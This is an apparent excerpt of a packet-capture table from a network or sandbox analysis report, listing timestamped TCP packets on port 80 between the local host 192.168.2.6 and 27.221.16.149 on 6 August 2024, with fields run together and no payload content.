                                                                                                                                    Aug 6, 2024 10:30:12.704547882 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704557896 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704595089 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704606056 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704617023 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704628944 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704701900 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704714060 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704734087 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.704734087 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.704777002 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.704828024 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704838991 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704849005 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704859018 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704869032 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704879045 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704889059 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.704890013 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.704914093 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.705001116 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.705208063 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705219984 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705274105 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.705620050 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705661058 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705672026 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705703974 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705714941 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705718040 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.705764055 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705775023 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705785036 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705815077 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.705815077 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.705838919 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.705871105 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705882072 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705892086 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705903053 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705912113 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705921888 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705952883 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.705970049 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705971003 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.705981016 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.705986977 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706031084 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.706047058 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706057072 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706068039 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706124067 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.706124067 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.706212997 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706223965 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706233978 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706244946 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706274986 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.706293106 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706305027 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.706306934 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706316948 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706329107 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706341028 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706351042 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706357002 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706366062 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706370115 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.706403971 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706420898 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706423998 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.706423998 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.706430912 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:12.706455946 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:12.755126953 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.041558027 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041575909 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041599035 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041610003 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041680098 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041692019 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041702986 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041714907 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041762114 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041771889 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041778088 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041815042 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041826963 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041836977 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041846991 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041901112 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041910887 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041920900 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.041990042 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042025089 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042037010 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042046070 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042057037 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042068005 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042097092 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042108059 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042120934 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042135000 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042190075 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042201996 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042212963 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042222977 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042233944 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042633057 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042645931 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042666912 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042676926 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042687893 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042810917 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042821884 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042831898 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042889118 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042900085 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.042910099 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043126106 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043144941 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043149948 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043168068 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043178082 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043188095 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043323994 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043335915 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043345928 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043356895 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.043368101 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.044047117 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.380606890 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380630016 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380640030 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380650997 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380661964 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380671978 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380683899 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380693913 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380709887 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380721092 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380728006 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.380732059 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380749941 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380759954 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380785942 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.380822897 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380834103 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380837917 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.380845070 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380855083 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380866051 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380873919 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.380891085 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.380932093 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380943060 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380953074 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380963087 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.380965948 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.381011009 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.381040096 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381051064 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381059885 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381071091 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381081104 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381083012 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.381134987 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.381455898 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381499052 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381510019 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381544113 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.381544113 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.381547928 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381560087 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381568909 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381608963 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.381614923 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381625891 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381660938 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.381663084 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381674051 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381685019 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381716013 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.381767035 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.381916046 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381959915 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.381969929 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382015944 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382025957 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.382028103 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382039070 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382050037 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382071972 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.382087946 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.382091045 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382102013 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382112026 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382143021 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.382173061 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.382350922 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382361889 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382371902 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382416010 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.382452011 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382462978 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382472038 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382482052 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382492065 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382497072 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.382502079 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.382539034 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.382812023 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.733906031 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.733926058 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.733942986 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.733958960 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.733980894 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.733998060 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734013081 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734028101 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734038115 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734044075 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734060049 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734076023 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734092951 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734103918 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734108925 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734108925 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734114885 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734127045 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734153986 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734153986 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734427929 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734445095 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734460115 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734474897 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734477043 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734489918 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734498978 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734507084 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734551907 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734807014 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734821081 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734832048 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734843016 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734854937 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734864950 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734878063 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734878063 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734879971 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.734911919 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.734945059 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735331059 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735347033 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735362053 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735385895 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735399961 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735400915 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735415936 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735439062 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735451937 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735451937 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735454082 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735467911 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735516071 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735558033 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735573053 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735586882 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735601902 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735618114 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735620975 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735632896 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735639095 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735650063 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735661983 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735672951 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735677004 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735682964 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735707998 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735738039 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735779047 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735790014 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735795975 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735879898 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735896111 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735913992 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735944033 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735944033 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.735949993 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735965014 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.735990047 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.736000061 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.736005068 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.736022949 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:13.736040115 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:13.736076117 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.075146914 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075160027 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075170040 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075198889 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075211048 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075221062 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075232029 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075261116 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.075295925 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075306892 CEST804977627.221.16.149192.168.2.6
